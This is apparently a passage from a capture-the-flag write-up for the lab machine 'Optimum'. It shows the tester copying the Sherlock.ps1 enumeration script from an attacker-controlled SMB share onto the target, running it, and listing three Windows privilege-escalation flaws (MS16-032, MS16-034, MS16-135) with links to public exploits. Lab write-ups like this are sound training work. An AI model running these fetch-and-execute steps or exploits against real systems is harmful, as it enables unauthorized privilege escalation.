Optimum_Sherlock

Sherlock

---

peas was not able to execute the embedded watson likely due to the machine being really old so i will go with sherlock, which is the predecessor of Watson

ps c:\tmp> copy \\10.10.14.6\smb\Sherlock.ps1 .
ps c:\tmp> . .\Sherlock.ps1
ps c:\tmp> Find-AllVulns
 
[...REDACTED...]
 
title      : Secondary Logon Handle
msbulletin : MS16-032
cveid      : 2016-0099
link       : https://www.exploit-db.com/exploits/39719/
vulnstatus : Appears Vulnerable
 
title      : Windows Kernel-Mode Drivers EoP
msbulletin : MS16-034
cveid      : 2016-0093/94/95/96
link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
vulnstatus : Appears Vulnerable
 
title      : Win32k Elevation of Privilege
msbulletin : MS16-135
cveid      : 2016-7255
link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
vulnstatus : Appears Vulnerable
 

Sherlock found a total of 3 vulnerabilities;

• MS16-032(CVE-2016-0099)
• MS16-034(CVE-2016-0093/94/95/96)
• MS16-135(CVE-2016-7255)